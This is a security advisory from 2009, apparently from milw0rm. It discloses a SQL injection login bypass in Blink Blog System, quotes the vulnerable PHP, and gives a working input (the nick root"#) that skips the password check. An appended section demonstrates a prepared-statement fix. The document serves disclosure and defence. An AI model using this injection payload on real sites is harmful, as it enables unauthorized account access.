******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

There are many SQL injection flaws, but I post the only one that allows a guest to bypass the login.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

...

$username = $_POST["nick"];            // raw POST value, used without escaping
$password = md5($_POST["password"]);
if ($data = $DB->usercheck($username, $password))

...

db.php:

function usercheck($username, $password)
{
    // $username is concatenated straight into the SQL text: a " in the nick
    // closes the string literal, and a following # (MySQL comment marker)
    // discards the rest of the statement, including the password condition.
    $try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");

...

***************************************************

[+] Code

- [A] Authentication Bypass

username: root"#
password: foo

***************************************************

[+] Fix

No fix.
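The advisory gives no vendor fix, so the following is an added example (not Blink Blog System code and not from the advisory's author) of how usercheck() would be written to close this flaw: the nick and password hash are passed as bound parameters of a PDO prepared statement instead of being spliced into the SQL text, so a quote or comment marker in the submitted nick is treated as data and cannot terminate the string literal or drop the password condition. The function names vulnerableQueryText() and usercheckSafe(), and the users table layout (id, nick, password), are assumptions; the example runs against an in-memory SQLite database so it is self-contained, and the same PDO calls work unchanged against MySQL. The unsalted md5 scheme is left as in the original because the point here is the injection, not the hash.

```php
<?php
// Added example, not part of the advisory or of Blink Blog System.
// Assumed: a users table with columns id, nick, password (md5 hex, as in the
// original code). SQLite in memory keeps the demo self-contained.
declare(strict_types=1);

// What the original concatenation in db.php produces, kept as a string for
// comparison only (never executed here). With a nick of root"# under MySQL,
// the " closes the literal and # comments out the AND password=... clause.
function vulnerableQueryText(string $username, string $password): string
{
    return "SELECT * FROM users WHERE nick=\"" . $username . "\" AND password=\"" . $password . "\" ";
}

// Hardened form: the SQL text is fixed; user input travels as bound parameters.
function usercheckSafe(PDO $db, string $username, string $passwordHash): ?array
{
    $stmt = $db->prepare('SELECT id, nick FROM users WHERE nick = :nick AND password = :pw');
    $stmt->execute([':nick' => $username, ':pw' => $passwordHash]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample database and user.
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, nick TEXT NOT NULL, password TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (nick, password) VALUES (:nick, :pw)');
$ins->execute([':nick' => 'root', ':pw' => md5('correct horse')]);

// The statement the original code would have sent for the advisory's input.
echo vulnerableQueryText('root"#', md5('foo')), "\n";

// Same input against the parameterized query: no matching row, login denied.
var_dump(usercheckSafe($db, 'root"#', md5('foo')));

// A legitimate login still succeeds.
var_dump(usercheckSafe($db, 'root', md5('correct horse')));
```

Run with the php CLI (pdo_sqlite is bundled with most builds). The first var_dump prints NULL: the nick root"# is compared literally against the nick column and matches nothing, while the second returns the id and nick of the stored user. Note that magic_quotes_gpc, named in the advisory as the precondition, is not a fix; it was removed from PHP, and parameterized queries are the only reliable way to keep input out of the statement.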

***************************************************

# milw0rm.com [2009-08-03]